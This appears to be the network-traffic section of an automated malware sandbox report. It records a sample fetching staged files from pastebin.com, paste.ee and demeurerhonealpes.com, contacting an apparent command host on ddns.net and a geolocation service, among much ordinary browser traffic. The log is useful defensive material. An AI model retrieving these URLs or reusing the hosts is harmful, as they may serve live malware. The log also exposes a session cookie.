              Source: global trafficHTTP traffic detected: GET /raw/SNtceP04 HTTP/1.1Host: pastebin.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /d/QCV6zpQe/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /ReM-SpReAd-XzY-2025.txt HTTP/1.1Host: demeurerhonealpes.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /raw/SNtceP04 HTTP/1.1Host: pastebin.com
              Source: global trafficHTTP traffic detected: GET /d/QCV6zpQe/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /raw/rTh3f4Xw HTTP/1.1Host: pastebin.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /ReM-SpReAd-XzY-2025.txt HTTP/1.1Host: demeurerhonealpes.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /d/vsnKLPWH/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /raw/rTh3f4Xw HTTP/1.1Host: pastebin.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /d/vsnKLPWH/0 HTTP/1.1Host: paste.eeConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /raw/2HkMnPyb HTTP/1.1Host: pastebin.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /raw/2HkMnPyb HTTP/1.1Host: pastebin.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
              Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
              Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
              Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
              Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
              Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
              Source: global trafficHTTP traffic detected: GET /openh264-win64-2e1774ab6dc6c43debb0b5b628bdf122a391d521.zip HTTP/1.1Host: ciscobinary.openh264.orgUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alive
              Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
              Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
              Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
              Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
              Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
              Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
              Source: global trafficHTTP traffic detected: GET /canonical.html HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateCache-Control: no-cachePragma: no-cacheConnection: keep-alive
              Source: global trafficHTTP traffic detected: GET /success.txt?ipv4 HTTP/1.1Host: detectportal.firefox.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: keep-alivePragma: no-cacheCache-Control: no-cache
              Source: global trafficDNS traffic detected: DNS query: drive.google.com
              Source: global trafficDNS traffic detected: DNS query: www.google.com
              Source: global trafficDNS traffic detected: DNS query: play.google.com
              Source: global trafficDNS traffic detected: DNS query: apis.google.com
              Source: global trafficDNS traffic detected: DNS query: blobcomments-pa.clients6.google.com
              Source: global trafficDNS traffic detected: DNS query: drive-thirdparty.googleusercontent.com
              Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
              Source: global trafficDNS traffic detected: DNS query: peoplestackwebexperiments-pa.clients6.google.com
              Source: global trafficDNS traffic detected: DNS query: pastebin.com
              Source: global trafficDNS traffic detected: DNS query: paste.ee
              Source: global trafficDNS traffic detected: DNS query: demeurerhonealpes.com
              Source: global trafficDNS traffic detected: DNS query: moneyluck.ddns.net
              Source: global trafficDNS traffic detected: DNS query: geoplugin.net
              Source: global trafficDNS traffic detected: DNS query: prod.classify-client.prod.webservices.mozgcp.net
              Source: global trafficDNS traffic detected: DNS query: detectportal.firefox.com
              Source: global trafficDNS traffic detected: DNS query: prod.detectportal.prod.cloudops.mozgcp.net
              Source: global trafficDNS traffic detected: DNS query: contile.services.mozilla.com
              Source: global trafficDNS traffic detected: DNS query: spocs.getpocket.com
              Source: global trafficDNS traffic detected: DNS query: prod.ads.prod.webservices.mozgcp.net
              Source: global trafficDNS traffic detected: DNS query: prod.balrog.prod.cloudops.mozgcp.net
              Source: global trafficDNS traffic detected: DNS query: example.org
              Source: global trafficDNS traffic detected: DNS query: ipv4only.arpa
              Source: global trafficDNS traffic detected: DNS query: content-signature-2.cdn.mozilla.net
              Source: global trafficDNS traffic detected: DNS query: prod.content-signature-chains.prod.webservices.mozgcp.net
              Source: global trafficDNS traffic detected: DNS query: firefox.settings.services.mozilla.com
              Source: global trafficDNS traffic detected: DNS query: shavar.services.mozilla.com
              Source: global trafficDNS traffic detected: DNS query: prod.remote-settings.prod.webservices.mozgcp.net
              Source: global trafficDNS traffic detected: DNS query: push.services.mozilla.com
              Source: global trafficDNS traffic detected: DNS query: shavar.prod.mozaws.net
              Source: global trafficDNS traffic detected: DNS query: telemetry-incoming.r53-2.services.mozilla.com
              Source: global trafficDNS traffic detected: DNS query: services.addons.mozilla.org
              Source: global trafficDNS traffic detected: DNS query: a19.dscg10.akamai.net
              Source: global trafficDNS traffic detected: DNS query: support.mozilla.org
              Source: global trafficDNS traffic detected: DNS query: us-west1.prod.sumo.prod.webservices.mozgcp.net
              Source: global trafficDNS traffic detected: DNS query: www.youtube.com
              Source: global trafficDNS traffic detected: DNS query: www.facebook.com
              Source: global trafficDNS traffic detected: DNS query: www.wikipedia.org
              Source: global trafficDNS traffic detected: DNS query: star-mini.c10r.facebook.com
              Source: global trafficDNS traffic detected: DNS query: youtube-ui.l.google.com
              Source: global trafficDNS traffic detected: DNS query: dyna.wikimedia.org
              Source: global trafficDNS traffic detected: DNS query: www.reddit.com
              Source: global trafficDNS traffic detected: DNS query: twitter.com
              Source: global trafficDNS traffic detected: DNS query: reddit.map.fastly.net
              Source: unknownHTTP traffic detected: POST /log?format=json&hasfast=true HTTP/1.1Host: play.google.comConnection: keep-aliveContent-Length: 1632sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-Type: application/binaryContent-Encoding: gzipsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://drive.google.comX-Client-Data: CJC2yQEIprbJAQipncoBCLf3ygEIlqHLAQiFoM0BCNy9zQEIucrNAQi2y80BCOnSzQEIitPNAQjB1M0BCM/WzQEI49bNAQiO180BCKfYzQEIutjNAQj5wNQVGLi/zQEY9snNARjrjaUXSec-Fetch-Site: same-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://drive.google.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: NID=521=QkA3za_f2r-VoMsaPg26kbve9O8rGOk0JJvB6qrnlcwJliWCyi6P-wcGPf-3vlzO_a1f-8gHSrVEGFShZWkWqM8j4XHXrPmZtv2BOILdUi_vBZXh94kQ8-x5m8KQOQQCQM6e4MzzCN8Colyq6xhG3THFVjWm_zyucEHgCXQmePQp0es19UuyBU5ZVGMTXK42qw
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
              Source: unknownNetwork traffic detected: HTTP traffic on port 60311 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60248 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60277 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60283 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60260 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60225 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60219 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
              Source: unknownNetwork traffic detected: HTTP traffic on port 60305 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
              Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
              Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60266 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60294 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60305
              Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60231 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60302
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
              Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60312
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60311
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60310
              Source: unknownNetwork traffic detected: HTTP traffic on port 60284 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60318
              Source: unknownNetwork traffic detected: HTTP traffic on port 49680 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60317
              Source: unknownNetwork traffic detected: HTTP traffic on port 60236 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60315
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60314
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60313
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknownNetwork traffic detected: HTTP traffic on port 60310 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60278 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60295 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60289 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
              Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60273 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
              Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60229 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60298
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60295
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60294
              Source: unknownNetwork traffic detected: HTTP traffic on port 60230 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
              Source: unknownNetwork traffic detected: HTTP traffic on port 60312 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
              Source: unknownNetwork traffic detected: HTTP traffic on port 60224 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60241 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60290 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60101 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
              Source: unknownNetwork traffic detected: HTTP traffic on port 60235 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
              Source: unknownNetwork traffic detected: HTTP traffic on port 60279 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60317 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60223 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60291 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
              Source: unknownNetwork traffic detected: HTTP traffic on port 60274 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
              Source: unknownNetwork traffic detected: HTTP traffic on port 60113 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60268 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60107 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60285 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60260
              Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60240 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60286 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60234 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60228 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60271
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60270
              Source: unknownNetwork traffic detected: HTTP traffic on port 60280 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60268
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60266
              Source: unknownNetwork traffic detected: HTTP traffic on port 60302 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60269
              Source: unknownNetwork traffic detected: HTTP traffic on port 60227 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60275 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60313 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60298 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60269 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60280
              Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60279
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60278
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60277
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60276
              Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60275
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60274
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60273
              Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60291
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60290
              Source: unknownNetwork traffic detected: HTTP traffic on port 60318 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60289
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60288
              Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60286
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60285
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60284
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60283
              Source: unknownNetwork traffic detected: HTTP traffic on port 60233 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
              Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60221 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60244 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60315 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
              Source: unknownNetwork traffic detected: HTTP traffic on port 60270 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60219
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
              Source: unknownNetwork traffic detected: HTTP traffic on port 60276 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60249 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60224
              Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60223
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60101
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60221
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60229
              Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60107
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60228
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60227
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60226
              Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60225
              Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60235
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60113
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60234
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60233
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60232
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60231
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60230
              Source: unknownNetwork traffic detected: HTTP traffic on port 60288 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60237
              Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60232 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60236
              Source: unknownNetwork traffic detected: HTTP traffic on port 60226 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60314 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60243 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 60237 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60244
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60243
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60241
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60240
              Source: unknownNetwork traffic detected: HTTP traffic on port 60271 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60249
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 60248
              Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.17:60223 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.17:60224 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.17:60225 version: TLS 1.2
